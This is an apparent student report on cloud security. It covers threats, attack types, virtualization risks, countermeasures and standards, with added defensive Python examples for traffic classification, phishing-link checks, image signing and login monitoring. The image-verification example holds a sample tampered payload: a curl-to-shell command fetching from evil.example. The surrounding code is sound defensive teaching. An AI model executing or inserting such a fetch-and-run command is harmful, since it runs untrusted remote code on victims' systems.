
Theme

Cloud Security

Presented by AOUIMEUR Yasmine, RESIN

Academic year

2022-2023
Contents

List of Figures
Abstract
1. Introduction
1.1. What is Cloud Computing?
1.2. Need for Cloud Computing
1.3. Layers and types of services provided by Cloud Computing
2. Cloud Security Risks and Threats
2.1. Common threats to cloud security
3. Attacks on Cloud Security
5. Virtualization security issues
6. Cloud Security Measures
7. Difference between Edge Computing and Cloud Computing
8. Difference between Fog Computing and Cloud Computing
9. Common Cloud Security Standards
10. Conclusion
References

List of Figures
Fig. 1 History of cloud computing
Fig. 2 Cloud computing fundamental characteristics
Fig. 3 Various service models in the cloud

Abstract
Cloud computing offers individuals and organizations new opportunities to use IT as a
utility. Computing power is consumed regardless of the user's location and device. It has
therefore become increasingly in demand because of its performance, high computing
power, low cost, elasticity, accessibility, rapid evolution and availability. This ubiquity,
however, comes with a range of security challenges. In this report, we discuss the security
challenges and vulnerabilities of the cloud as well as the limits of current security measures.

Keywords: Cloud Computing, Cloud Security, Cloud Security Challenges.

1. Introduction

1.1. What is Cloud Computing?
Cloud computing is a model in which computing resources (storage, processing,
applications) are delivered as services over the Internet and are used to manage, access
and store data on a provider's infrastructure rather than on an organization's own servers
or local drives. It is sometimes loosely called "serverless", but the servers still exist; they
are simply owned and operated by the provider instead of the customer (strictly, serverless
refers to one specific cloud execution model in which the customer manages no servers at
all). The data can be anything: images, audio, video, documents, files, etc.

1.2. Need for Cloud Computing


Before cloud technology, most small and large IT organizations used conventional
methods: data was kept on servers in rooms dedicated only to that purpose, and the
database server, mail server, firewalls, routers, modems, high-speed network devices, etc.
all had to be housed in that server room. IT companies had to spend a great deal of money
on this. Cloud computing came into existence to reduce these cost problems, and most
companies have shifted to it.

In the modern era computing has become a need for every business and individual. A
significant amount of time is spent maintaining resources and updating hardware and
software components. Everything must be kept synchronized while providing access to
remote resources, without requiring special devices capable of performing all processing
locally. Cloud computing answers all these requirements by providing computing power as
a utility for every user. Regardless of the hardware users own and its processing capability,
the cloud provides high processing power on demand and charges by usage.

Cloud users do not need to manage and update hardware and software resources
themselves, so in most cases cloud computing lowers computing expenses. The shift to the
cloud lets the IT team spend less time on maintenance and focus on activities with greater
impact. Integration with other technologies is easier, and legacy systems can often be
connected to cloud services. Capacity is more scalable and recoverable than before, since
users get what they request for their servers. The platform is highly customizable, so
organizations can easily deploy their own systems on it.

For application developers, cloud computing provides thousands of pre-built and tested
modules ready to be integrated into a new application. User data is stored in a single
repository, so it is accessible remotely from anywhere in the world. Users get synchronized
data on their personal computers, mobile devices and, through a browser, anywhere on the
Internet, and they can easily share it with friends and colleagues.

Users can control what they display and what they keep private, while enjoying a high level
of accessibility and availability. Amazon EC2, Google App Engine, Salesforce.com,
SaaSGrid and GoGrid are some examples of cloud computing offerings.

1.3. Layers and types of services provided by Cloud Computing


Cloud computing can be divided into the following service levels: Infrastructure as a
Service, Platform as a Service and Software as a Service, as shown in Fig. 2. Fig. 3
presents the separation between the service models, that is, which underlying layers are
controlled by the cloud service provider and which by the customer in each model.

1. Infrastructure as a Service (IaaS): customers obtain a complete computing
infrastructure (virtual machines, storage, networking) over the Internet and remain
responsible for the operating system and everything above it. Example: Amazon EC2
[10] and S3 [20].
2. Platform as a Service (PaaS): customers obtain a platform for developing and running
software applications; the provider manages the operating system and runtime.
Example: Microsoft Azure [8] and Google App Engine [9].
3. Software as a Service (SaaS): customers are provided with software over the Internet.
In this model users do not install the software; they use the provider's web-based
application to do their work. Example: Dropbox [21] and Office 365 [22].

2. Cloud Security Risks and Threats
2.1. Common threats to cloud security
There is no doubt that cloud computing provides many advantages, but it also brings
security issues. Some of them are listed below:

• Data Loss and Data Leakage
Data loss (data that is destroyed or becomes unavailable) and data leakage (data that
is disclosed to an unauthorized party) are among the main issues in cloud computing.
Sensitive data is in the hands of somebody else, and the customer does not have full
control over the database. If the security of the cloud service is broken by attackers,
they may gain access to our sensitive data or personal files.

• Interference of Hackers and Insecure APIs
Talking about the cloud and its services means talking about the Internet, and the
easiest way to communicate with the cloud is through its APIs. It is therefore
important to protect the interfaces and APIs that are exposed to external users: every
call must be authenticated, authorization must be enforced on every object returned,
and abuse must be rate-limited. In addition, some cloud services are reachable from
the public Internet, and this is the most exposed part of the cloud, because third
parties may reach these services and use them to access or damage our data.

• User Account Hijacking
Account hijacking is one of the most serious security issues in cloud computing. If the
account of a user or an organization is taken over by an attacker, the attacker inherits
all of that account's privileges and can perform unauthorized actions with them.

• Changing Service Provider
Vendor lock-in is also an important issue in cloud computing. Organizations face
several problems when shifting from one vendor to another. For example, an
organization that wants to move from AWS to Google Cloud has to migrate all of its
data, and because the two clouds have different techniques and functions, it also has
to adapt its systems. The pricing of AWS may also differ from that of Google Cloud.

• Lack of Skill
Day-to-day operation, migrating to another provider, adding a feature or simply
knowing how to use one are the main problems in an IT company that does not have
skilled employees. Working with cloud computing requires skilled people.

• Denial of Service (DoS) attack
This type of attack occurs when a system receives more traffic than it can handle, so
legitimate users can no longer reach the service. Large organizations such as the
banking and government sectors are frequent targets. A DoS attack affects
availability rather than the data itself, but recovering from one, and the downtime it
causes, costs a great deal of money and time.

3. Attacks on Cloud Security
Companies know the value of cloud computing in a business environment. Day by day
new technologies emerge, and each one that is adopted in cloud infrastructure brings new
attacks with it. Some of these attacks are described below. Table 3 summarizes several
security attacks, their effects on the cloud and some solutions.

Denial of service attack. In a denial of service attack the attacker sends thousands of
request packets to the victim over the Internet. The attacker's aim is to exhaust the
victim's resources: a flood of requests wastes computational power, processing time and
cryptographic operations, which affects the actual behaviour of the cloud and the
availability of its services. The attacker sends different types of packets, including
Transmission Control Protocol (TCP), User Datagram Protocol (UDP) and Internet Control
Message Protocol (ICMP) echo request packets. In the first type, the attacker floods the
victim with TCP packets that have the SYN flag set. The victim assumes the requests come
from legitimate users and starts the three-way handshake for each one, reserving buffer
space for every half-open connection; the handshakes never complete and the connection
table fills up. This very common attack is known as the SYN flood. In the second type, the
attacker sends a large number of UDP packets to ports on which the victim is not listening;
for each one the victim answers with an ICMP "destination unreachable" message,
consuming time on every response. In the third type, the attacker sends a very large
number of ICMP echo request packets whose destination is the broadcast address of a
network and whose source address is spoofed to be the victim's. Every host on that
network sends an echo reply to the victim, which amplifies the traffic. This is referred to
as a Smurf attack. Another variant is the DDoS attack. A distributed DoS attack is much
more complex and harder to detect than a simple DoS attack. In a DDoS attack the
attacker, called the controller, first scans the network, lists the defenceless hosts, called
handlers, and compromises them. Each handler then recruits many agents, called
zombies, which launch the attack.

Service injection attack. The cloud system provides services to its users. When a user
wants to access a service he first sends a request to the cloud, and the cloud system is
responsible for allocating free resources to the requested service. A resource allocated to
one user may be assigned to another requesting user at some later point. An attacker
builds a malicious copy (image) of a service, resource or virtual machine and repeatedly
tries to inject it into the cloud environment. When a legitimate user then requests the
service, the malicious instance is served as if it were the genuine cloud service, which
corrupts the cloud's actual functionality. To protect against this type of attack a service
integrity module should be implemented: every service image must be checked against a
trusted, signed reference (for example a cryptographic hash) before it is deployed or served.

Attack on virtualization. Virtualization attacks in the cloud come in two main forms: VM
escape (breaking out of a guest VM to the hypervisor or host) and rootkits installed in the
hypervisor. In a virtualization attack the attacker takes control of virtual machines in the
virtual environment, often by exploiting a zero-day vulnerability. Other related attacks
include backdoor channel attacks, VM modification, storage allocation abuse and
multi-tenancy attacks.

User to root attack. In this attack the attacker or intruder acquires unlimited (root) access
to the whole system after seizing the account and password of an authorized, normally
unprivileged user. This type of attack is typically executed through a buffer overflow, in
which more data is sent to a statically sized buffer than it can hold, overwriting adjacent
memory.

Port scanning. Port scanning is used to identify the open, closed and filtered ports of a
system. Through scanning, intruders learn which services are listening on open ports and
collect information such as the IP and MAC addresses involved in a connection. The most
common port scanning techniques include TCP connect, UDP, SYN/FIN/ACK and window
scanning. The actual attack is launched by the attacker after the ports have been scanned.
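The traffic patterns described in the denial of service and port scanning paragraphs above can be recognized from flow records. The following is an added example, not code from the report: it classifies sources in a constructed flow log as a SYN flood (many SYNs that never complete the handshake), a UDP flood, a Smurf-style stream of ICMP echo requests to a broadcast address, or a port scan (one source touching many distinct ports). The record format, the thresholds and the assumption that networks are /24 (broadcast ends in .255) are all choices made for this illustration.

```python
"""Classify suspicious traffic in a constructed flow log.

Added example (not from the report). Record layout, thresholds and the
/24 broadcast assumption are illustrative choices, not a real sensor format.
"""
from collections import defaultdict

# Constructed sample flow records: (src, dst, proto, dst_port, flags)
# flags: TCP flag letters for tcp, ICMP type for icmp, "" for udp.
SAMPLE_FLOWS = (
    # normal client: full handshake to 443 (SYN followed by ACK)
    [("10.0.0.5", "203.0.113.10", "tcp", 443, "S"),
     ("10.0.0.5", "203.0.113.10", "tcp", 443, "A")]
    # SYN flood: many half-open connections from one source, never ACKed
    + [("198.51.100.7", "203.0.113.10", "tcp", 80, "S") for _ in range(200)]
    # UDP flood towards a port with no listener
    + [("198.51.100.8", "203.0.113.10", "udp", 53999, "") for _ in range(150)]
    # Smurf: echo requests (type 8) to the broadcast address, source spoofed to the victim
    + [("203.0.113.10", "203.0.113.255", "icmp", 0, "8") for _ in range(60)]
    # port scan: one source probing many distinct ports once each
    + [("198.51.100.9", "203.0.113.10", "tcp", p, "S") for p in range(1, 60)]
)

BROADCAST_SUFFIX = ".255"   # assumption: /24 networks in the sample
SYN_FLOOD_MIN = 100         # half-open connections per source
UDP_FLOOD_MIN = 100
SMURF_MIN = 20
SCAN_MIN_PORTS = 25


def classify(flows):
    """Return {source_ip: sorted labels} for every source that matches a pattern."""
    syn = defaultdict(int)      # SYNs per source
    ack = defaultdict(int)      # ACKs per source (handshakes that completed)
    udp = defaultdict(int)
    smurf = defaultdict(int)    # echo requests whose destination is a broadcast address
    ports = defaultdict(set)    # distinct TCP/UDP destination ports per source

    for src, dst, proto, dport, flags in flows:
        if proto == "tcp":
            if flags == "S":
                syn[src] += 1
            elif "A" in flags:
                ack[src] += 1
            ports[src].add(dport)
        elif proto == "udp":
            udp[src] += 1
            ports[src].add(dport)
        elif proto == "icmp" and flags == "8" and dst.endswith(BROADCAST_SUFFIX):
            # In a Smurf attack the source field carries the victim's spoofed
            # address, so this label identifies the victim, not the attacker.
            smurf[src] += 1

    verdicts = defaultdict(list)
    for src in set(syn) | set(udp) | set(smurf) | set(ports):
        half_open = syn[src] - ack[src]
        if half_open >= SYN_FLOOD_MIN:
            verdicts[src].append("syn_flood")
        if udp[src] >= UDP_FLOOD_MIN:
            verdicts[src].append("udp_flood")
        if smurf[src] >= SMURF_MIN:
            verdicts[src].append("smurf_victim_spoofed")
        if len(ports[src]) >= SCAN_MIN_PORTS:
            verdicts[src].append("port_scan")
    return {src: sorted(v) for src, v in verdicts.items()}


if __name__ == "__main__":
    for src, labels in sorted(classify(SAMPLE_FLOWS).items()):
        print(src, ", ".join(labels))
```

The SYN flood rule keys on the difference between SYNs and ACKs rather than on raw SYN volume, so a busy but legitimate client that completes its handshakes is not flagged; the port scan rule is deliberately independent of volume, since a slow scan sends only one packet per port.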

Man-in-the-middle attack. A man-in-the-middle attack is one in which an attacker actively
sits between two parties and reads or alters the data passed between them. In the cloud it
becomes possible when Secure Sockets Layer (SSL)/TLS is not configured securely, for
instance when the server certificate is not verified. When two parties, including the
provider, communicate in the cloud, an attacker residing in the middle can access the data
if the communication channel is not secured.

Metadata spoofing attack. The functionality and details of a web service are described in
its WSDL file. In this type of attack an attacker wants to access this file and modify or
delete it. He waits until service delivery time, and at delivery time succeeds in altering the
service invocation code in the WSDL file so that clients invoke the wrong operation or
endpoint. The solution is to keep information about service functionality and other details
in encrypted form and to require strong authentication to access such files; the description
should also be integrity-protected (signed) so that any modification can be detected.

Phishing attack. A phishing attack manipulates a web link. As a result, a legitimate user is
redirected to a fake web page which he believes is the genuine, secure page, and he enters
his credentials (user name and password). The attacker then has his credentials.
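The link manipulation just described can be checked mechanically before a user clicks. The following is an added example, not code from the report: given the visible anchor text and the real `href`, it reports the tricks phishing links rely on (the visible domain differing from the real host, a `user@` prefix that makes the real host look like a path, a raw IP address, a punycode/IDN label that may be a homograph, and a non-https scheme). The sample links and the set of trusted domains are constructed assumptions.

```python
"""Check a link for the manipulations used in phishing mails.

Added example (not from the report). TRUSTED_DOMAINS and the sample
links are constructed for illustration.
"""
import ipaddress
from urllib.parse import urlsplit

TRUSTED_DOMAINS = {"bank.example", "login.bank.example"}   # assumption


def host_of(url: str) -> str:
    """Host the browser actually connects to (userinfo and port stripped, lowercased)."""
    return (urlsplit(url).hostname or "").lower()


def shown_host(display_text: str) -> str:
    """Domain the reader sees, if the anchor text looks like a URL or domain; else ''."""
    text = display_text.strip()
    if " " in text or "." not in text:
        return ""
    if "://" not in text:
        text = "https://" + text
    return host_of(text)


def link_findings(display_text: str, href: str) -> list:
    parts = urlsplit(href)
    host = host_of(href)
    findings = []
    if parts.scheme != "https":
        findings.append("scheme is not https")
    if parts.username is not None:
        # https://login.bank.example@evil.example/ connects to evil.example
        findings.append("userinfo before '@' disguises the real host")
    try:
        ipaddress.ip_address(host)
        findings.append("raw IP address used as host")
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append("punycode (IDN) label in host, possible homograph")
    shown = shown_host(display_text)
    if shown and shown != host and not host.endswith("." + shown):
        findings.append(f"text shows {shown} but link goes to {host}")
    if host not in TRUSTED_DOMAINS:
        findings.append(f"{host} is not a trusted domain")
    return findings


if __name__ == "__main__":
    # Constructed sample: the text names the bank, the href goes to evil.example
    for f in link_findings("https://login.bank.example",
                           "https://login.bank.example@evil.example/reset"):
        print("-", f)
```

The `hostname` attribute of `urlsplit` already discards the userinfo and port, which is exactly why the check compares against it rather than against the raw `netloc` string the user is shown.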

Backdoor channel attack. A backdoor channel attack lets the attacker remotely reach a
program that controls the victim's resources. It is a passive attack in the sense that the
victim does not notice it. An attacker may deploy zombies in this way so that they can
later perform a DDoS attack; more often, attackers use backdoor channels simply to control
the victim's resources. It can breach the privacy and confidentiality of the data.

5. Virtualization security issues


The reason behind the wide adoption of cloud computing in industry is virtualization. To
develop cloud services for business purposes, the cloud provider must be able to trust the
VMs. In cloud environments virtualization is the primary requirement of any service.
Multi-tenancy and virtualization bring more profit, but they are not free from threats and
attacks. Many attackers perform co-location attacks (placing their own VM on the same
physical host as the target) to get at services. Research continues day by day on how to
achieve proper logical and virtual isolation. The virtualization software used to create
virtualized services and images may itself contain several kinds of vulnerabilities or
malware that damage or break the virtualized code.

• VM image management. The dynamic nature of the cloud allows the provider to
create, modify and copy VM images. This is possible because of the service-oriented
and elastic features of the cloud. The cloud environment is volatile: its state changes
with the situation, and this feature can bring new issues. VM images are kept in a
repository. They can easily be turned off, turned on or suspended with their current
working state saved. The dynamic nature also lets a user create her own VM images
or reuse a previously created one. One possible avenue of attack is that a malicious
user uploads corrupted images that contain malware to the repository, or studies the
code of an image to look for probable attack points. The risks include hosting,
distributing and managing VM images. A malicious VM image can observe user
activity or data, resulting in data theft or a breach of user privacy. If VM images are
not properly managed, the system can suffer more serious harm, such as exposure of
confidential user data. Improper management of VMs can also leak administrator
passwords or decrease efficiency through VM sprawl, a situation in which the number
of VMs on the host keeps increasing while previously installed VMs sit idle. This
wastes resources on the host machine and complicates VM management.
• Virtual machine monitor (VMM). The VMM is a well-known term in virtualization,
and VMMs are not free of vulnerabilities. The VMM is the software component that
regulates all the virtual machines and their connection with the hardware. Its core
responsibility is the management and isolation of each running VM; it is also
responsible for creating and managing each virtual resource. The paper [126]
discusses hypervisor vulnerabilities, including attacks that broke the security of Xen
and KVM. The complexity of the interconnections and the many entry points into the
VMM create a large number of attack vectors. The guest user is required to trust the
underlying virtual hardware and the VMM. VMM-based rootkit attacks are possible
because the VMM is transparent to the guests it hosts. Such an attack compromises
the trust model, in which the VMM is a single point of failure, and lets a malicious
user on the VMM affect every guest. Lack of monotonicity is another security issue in
the VMM: a VM's execution path is no longer linear once it can be rolled back. For
example, restoring a VM or a snapshot can lose database information, log files,
monitoring data and application settings, and it can also replay one-time values such
as random numbers or nonces that the guest already used. Separating data from the
snapshotting process can also create a security issue for data storage. Isolation,
interposition and inspection are the three areas of concern in VMMs. An attack
named VM escape refers to a situation in which an attacker breaks out of a guest VM
and gains control of the VMM or hypervisor. The attacker can then monitor other
virtual machines, access the shared infrastructure, monitor CPU utilization or shut
the VMM down. Known hypervisor rootkits and attacks include BluePill [19],
SubVirt and Direct Kernel Structure Manipulation (DKSM). Computational overhead
on the VMM, VM diversity, execution of malicious code and zero-day vulnerabilities
are other concerns that remain unsolved.
• Network virtualization. In the real world, managing physical Ethernet or radio
networks is hard because of frequent interruptions and anomalies, and the traffic on
them raises security issues. At the virtualized network layer, tried-and-tested
network security solutions might not work under high traffic. When people move to
virtualized networks in the cloud environment, the security of such networks
decreases: in a virtual infrastructure the protection offered by Virtual Local Area
Networks (VLANs) and firewalls is reduced. Many security vendors therefore provide
their security services in virtualized form; for example, the Cisco Virtual Security
Gateway for the Nexus 1000V series switch runs as a virtual appliance on VMware.
The paper [174] discusses the network performance of Amazon EC2 under
virtualization and presents the reasons for its unstable network characteristics,
abnormal packet delay and unstable TCP and UDP throughput. Such abnormal
behaviour opens network holes, described as network tailoring and limited
administrative access, in the cloud. These security issues and loopholes encourage
attackers to target sensitive portions of the virtual infrastructure and possibly access
sensitive information about users or providers. Amazon EC2 makes its virtual
machines publicly reachable through a unique identifier, the public IP address
assigned to the user. The bridged adapter is responsible for sending, receiving and
listening for incoming and outgoing network packets from the host, and it takes some
time to check firewall rules, Network Address Translation (NAT) modifications and
MAC addresses. A related issue is promiscuous mode, in which a running VM's virtual
interface reads all the packets passing on the virtual switch, including those not
addressed to it, which makes sniffing of other tenants' traffic possible. Other security
issues present in virtualized networking include packet sniffing, spoofing and
network-based VM attacks.
• Mobility. VM cloning or template image cloning is the process of copying or moving
a VM to other servers. This can create problems because several running copies of
the same image trust the same software and the same initial state, so the copying
process propagates errors and misconfigurations, or worse. If the image being copied
contains secret keys or other private information of the owner, that information is
leaked to every other VM made from it. There are multiple copies of the VM across
the network; if an attacker obtains one copy and attacks it offline, he may be able to
read the data and break the administrative password. The mobility of VMs makes it
quick to develop and deploy VM images, but it also brings new security issues and
challenges, so all security issues during transfer must be addressed.
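Both the "service integrity module" called for under the service injection attack in Section 3 and the VM image management issue above come down to the same control: never launch an image that has not been checked against a trusted, signed reference. The following is an added example, not code from the report. The image bytes, the manifest format and the use of an HMAC-SHA256 over the manifest are assumptions for illustration; a production repository would sign the manifest with an asymmetric key kept offline, so that a compromised repository cannot forge it.

```python
"""Verify a VM image against a signed manifest before it is launched.

Added example (not from the report): a minimal "service integrity module".
Image bytes, manifest layout and the HMAC signing key are constructed for
illustration; production systems would use an offline asymmetric signing key.
"""
import hashlib
import hmac
import json

SIGNING_KEY = b"example-manifest-signing-key"          # assumption
GOOD_IMAGE = b"#!/bin/sh\necho booting approved image\n"   # constructed "image"
TAMPERED_IMAGE = GOOD_IMAGE + b"curl http://evil.example/x | sh\n"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(images: dict, key: bytes) -> dict:
    """images maps image name -> bytes. Returns {'entries': {...}, 'sig': hex}."""
    entries = {name: sha256_hex(data) for name, data in images.items()}
    body = json.dumps(entries, sort_keys=True).encode()   # canonical form
    return {"entries": entries, "sig": hmac.new(key, body, "sha256").hexdigest()}


def verify_image(name: str, data: bytes, manifest: dict, key: bytes) -> bool:
    """True only if the manifest signature is valid AND the image digest matches."""
    body = json.dumps(manifest["entries"], sort_keys=True).encode()
    expected_sig = hmac.new(key, body, "sha256").hexdigest()
    if not hmac.compare_digest(expected_sig, manifest["sig"]):
        return False                    # the manifest itself was altered
    digest = manifest["entries"].get(name)
    if digest is None:
        return False                    # unknown image: refuse by default
    return hmac.compare_digest(digest, sha256_hex(data))


if __name__ == "__main__":
    manifest = build_manifest({"web-base": GOOD_IMAGE}, SIGNING_KEY)
    print("approved image:", verify_image("web-base", GOOD_IMAGE, manifest, SIGNING_KEY))
    print("tampered image:", verify_image("web-base", TAMPERED_IMAGE, manifest, SIGNING_KEY))
```

Checking the manifest signature first matters: without it an attacker who can write to the repository simply replaces the digest alongside the image, and a digest-only check passes.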

6. Cloud Security Measures


Cloud security has evolved with the adoption of cloud computing, and the concept is
becoming more and more critical as more users adopt cloud services. With many users
around the world, cloud services that are not protected adequately leave vast amounts of
customer data exposed to attackers from all over the world. Cloud security takes several
forms: protection against network attacks and software attacks, intrusion detection, access
control, analysis of abnormal behaviour, and analysis of viruses, malware, Trojans and so
on. Security measures that help ensure cloud security are presented below:

a. Password: To secure cloud services against simple attacks on the access controls,
users are encouraged to use a unique password for each cloud-based service.
Customers should not use simple passwords or reuse a password that has been used
on some other service on the Internet. Cloud service providers should make sure that
passwords are never stored in a form that can be directly related back to the user
names in their database: only a salted, slow hash of each password should be kept.
If the cloud service provider is breached, this makes it hard for attackers to recover
the passwords that belong to the user names [29].
b. Access Recovery: Customers should use confidential details or questions to recover
access to the cloud in case they forget their password. Users should not choose
information that can be obtained through social engineering or simply by reading
their social networking profiles, since most personal details are posted on such
websites. Using such information, attackers can gain access to the cloud without
knowing the person.
c. Encryption: Using a good encryption technique always protects the customer's data.
Homomorphic encryption would even let the provider process data without decrypting
it, but homomorphic encryption is still not completely feasible in real-time scenarios
[30].
d. Password Management: As discussed in the first point, users should not reuse their
passwords, and cloud service providers should encourage them to use strong
passwords with special characters, symbols, letters and numbers. It is tough for users
to remember all of their user names and passwords, so they need a proper password
manager for storing them and protecting them from anyone else getting access [31].
e. Multi-factor authentication: Multi-factor authentication adds an extra layer of
security to the traditional user name and password approach to accessing cloud
services. Customers need two or more factors to authenticate themselves as genuine
users of the cloud. These factors fall into three categories: knowledge (something only
the user knows, such as a password or PIN), possession (something the user has, such
as an RSA token, a USB security key or a one-time code sent to their mobile) and
inherence (something the user is, such as a biometric feature) [32]. Cloud service
providers should support multi-factor authentication and encourage customers to use
it instead of simple user name and password authentication. In this way unauthorized
access to customer data can be prevented even if someone has the customer's
credentials, since they will not have the other factors.
f. Login Monitor: Cloud service providers and customers need to monitor the devices
recently used to access cloud services. With that information users can tell whether
someone else has logged in with their credentials and change their passwords in case
of a suspicious login from an unknown device or location. Cloud service providers
need to improve their login statistics, with proper details for every device connected
to the cloud services, for all customers [33].
g. Personal Devices: Customers should be careful about where they log in to the cloud.
They should avoid using someone else's device, as it might carry a key logger (a
program which records every key pressed while it is running). If such an application
is present, the attacker obtains the user's cloud credentials, compromising the
customer's security [34].
h. Viruses, Malware and Trojans: Customers should have good anti-virus and
anti-spyware applications on their devices. Without proper protection, the devices
they use to reach cloud services might carry viruses or malware that capture user
credentials and gain access to the cloud services, putting personal and confidential
details in the hands of unauthorized persons or attackers. It is a good habit for users
to run good anti-virus and anti-spyware applications to protect their personal devices
[35].
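Points a, d and e above (password storage on the provider side, strong passwords, and a second factor) can be shown together in one login check. The following is an added example, not code from the report. Passwords are stored as a per-user random salt plus PBKDF2-HMAC-SHA256, so two users with the same password get different records and a leaked database does not give the passwords back; the second factor is an RFC 6238 time-based one-time password. The user store, the iteration count and the tolerance of one time step either side are assumptions; the TOTP secret is the RFC 4226 test secret, so the codes can be checked against the vectors published in that RFC.

```python
"""Password storage plus a TOTP second factor for a cloud login.

Added example (not from the report). ITERATIONS, the +/-1 step window and
the user store are assumptions; RFC_TEST_SECRET is the RFC 4226 test secret.
"""
import hashlib
import hmac
import os
import struct

ITERATIONS = 600_000          # assumption: PBKDF2-HMAC-SHA256 work factor
TOTP_STEP = 30
TOTP_DIGITS = 6
RFC_TEST_SECRET = b"12345678901234567890"   # RFC 4226 Appendix D test secret


def weak_record(password: str) -> str:
    """Anti-pattern: unsalted fast hash; every user with this password gets the same record."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_record(password: str) -> str:
    """Return 'pbkdf2_sha256$iters$salt_hex$hash_hex' for storage."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    algo, iters, salt_hex, hash_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), hash_hex)


def hotp(secret: bytes, counter: int, digits: int = TOTP_DIGITS) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian 8-byte counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), "sha1").digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int) -> str:
    """RFC 6238: HOTP with the counter derived from the 30-second time step."""
    return hotp(secret, unix_time // TOTP_STEP)


def verify_totp(secret: bytes, code: str, unix_time: int, window: int = 1) -> bool:
    """Accept the current step and `window` steps either side to absorb clock drift."""
    counter = unix_time // TOTP_STEP
    return any(hmac.compare_digest(hotp(secret, c), code)
               for c in range(counter - window, counter + window + 1))


def authenticate(store: dict, user: str, password: str, code: str, unix_time: int) -> bool:
    """Both factors must pass; an unknown user fails."""
    entry = store.get(user)
    if entry is None:
        return False
    return verify_password(password, entry["pw"]) and verify_totp(entry["totp"], code, unix_time)


if __name__ == "__main__":
    users = {"alice": {"pw": make_record("correct horse battery"), "totp": RFC_TEST_SECRET}}
    # At Unix time 59 the RFC 6238 vector for this secret (SHA-1, 6 digits) is 287082.
    print(authenticate(users, "alice", "correct horse battery", "287082", 59))
    print(authenticate(users, "alice", "correct horse battery", "000000", 59))
```

A stolen database of `make_record` outputs forces an attacker to run the full PBKDF2 cost per guess per user, whereas `weak_record` lets one precomputed table cover every user; and a stolen password alone still fails `authenticate` without the current TOTP code.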
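The login monitoring of point f, and the account hijacking it is meant to catch (Section 2.1), can be turned into two simple rules over a login log. The following is an added example, not code from the report: it flags a login from a device/country pair never seen for that user, and two logins from different countries closer together than a plausible travel time. The log lines, the baseline of known devices and the six-hour threshold are constructed assumptions.

```python
"""Flag suspicious logins in a constructed login log.

Added example (not from the report). Log format, the KNOWN baseline and
MIN_TRAVEL are assumptions chosen for illustration.
"""
from datetime import datetime, timedelta

# Constructed sample events: "timestamp user country device_id"
LOG = """\
2023-03-01T08:00:00 alice FR laptop-a1
2023-03-01T08:30:00 alice FR phone-a2
2023-03-01T09:10:00 bob   DE laptop-b1
2023-03-01T09:40:00 alice BR win-unknown
2023-03-02T10:00:00 bob   DE laptop-b1
"""

# Baseline: (country, device) pairs each user has used before (assumption)
KNOWN = {
    "alice": {("FR", "laptop-a1"), ("FR", "phone-a2")},
    "bob": {("DE", "laptop-b1")},
}
MIN_TRAVEL = timedelta(hours=6)   # assumption: a country change in under 6 h is implausible


def parse(log: str):
    events = []
    for line in log.splitlines():
        ts, user, country, device = line.split()
        events.append((datetime.fromisoformat(ts), user, country, device))
    return events


def suspicious_logins(log: str, known: dict):
    """Return [(user, iso_timestamp, reason)] in chronological order."""
    alerts = []
    last_seen = {}                       # user -> (time, country) of previous login
    for ts, user, country, device in sorted(parse(log)):
        if (country, device) not in known.get(user, set()):
            alerts.append((user, ts.isoformat(), f"new device/country {device}/{country}"))
        prev = last_seen.get(user)
        if prev and prev[1] != country and ts - prev[0] < MIN_TRAVEL:
            alerts.append((user, ts.isoformat(), f"impossible travel {prev[1]} -> {country}"))
        last_seen[user] = (ts, country)
    return alerts


if __name__ == "__main__":
    for user, when, reason in suspicious_logins(LOG, KNOWN):
        print(f"{when} {user}: {reason}")
```

The two rules are complementary: the device rule catches a hijacker using their own machine even from the victim's country, and the travel rule catches one who spoofs a known device identifier but connects from somewhere the victim cannot have reached yet.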

7. Difference between Edge Computing and Cloud Computing
Edge computing and cloud computing are two paradigms of the modern digital world. Both
are growing paradigms for storing and processing data; the difference is where that
happens, in a central data center or close to the data source. Table 1.1 below gives the
fundamental differences between them.

8. Difference between Fog Computing and Cloud Computing
Cloud Computing: The delivery of on-demand computing services is known as cloud
computing. We can use anything from applications to storage and processing power over
the Internet, paid for as we go. Without owning any computing infrastructure or data
centers, anyone can rent access to these services from a cloud service provider.
Cloud computing lets us avoid the complexity of owning and maintaining infrastructure
and pay only for what we use.
In turn, cloud service providers benefit from significant economies of scale by delivering
the same services to a wide range of customers.

Fog Computing: Fog computing is a decentralized computing infrastructure or process in
which computing resources are located between the data source and the cloud or any
other data center. It provides services to user requests at the edge of the network. The
devices at the fog layer usually perform networking operations; they are routers, gateways,
bridges and hubs, which researchers envision being capable of performing computational
and networking operations simultaneously. Although these devices are resource-constrained
compared to cloud servers, their geographical spread and decentralized nature help them
offer reliable services with coverage over a wide area. Fog computing is defined by the
physical location of the devices, which are much closer to the users than the cloud servers.

9. Common Cloud Security Standards


1. NIST (National Institute of Standards and Technology)

NIST is a US federal agency that develops measurement science, standards and guidelines
to promote innovation and industrial competitiveness. It developed the Cybersecurity
Framework, which organizations use to structure their security programs and to help meet
US regulations such as the Federal Information Security Management Act (FISMA) and the
Health Insurance Portability and Accountability Act (HIPAA). NIST places a strong
emphasis on classifying assets according to their value to the business and protecting them
accordingly.

2. ISO/IEC 27017

ISO/IEC 27017 is an extension of ISO/IEC 27001 that adds provisions specific to
cloud-based information security, and compliance with it should be considered alongside
ISO/IEC 27001 compliance. Published in 2015, it offers further direction in the field of
cloud computing information security. Its purpose is to supplement the advice in ISO/IEC
27002 and other ISO27k standards, such as ISO/IEC 27018 on the privacy implications of
cloud computing and ISO/IEC 27031 on business continuity.

3. CIS Controls

Organizations can secure their systems with the help of the Center for Internet Security
(CIS) Controls, a freely available set of consensus-based best practices. Each control is
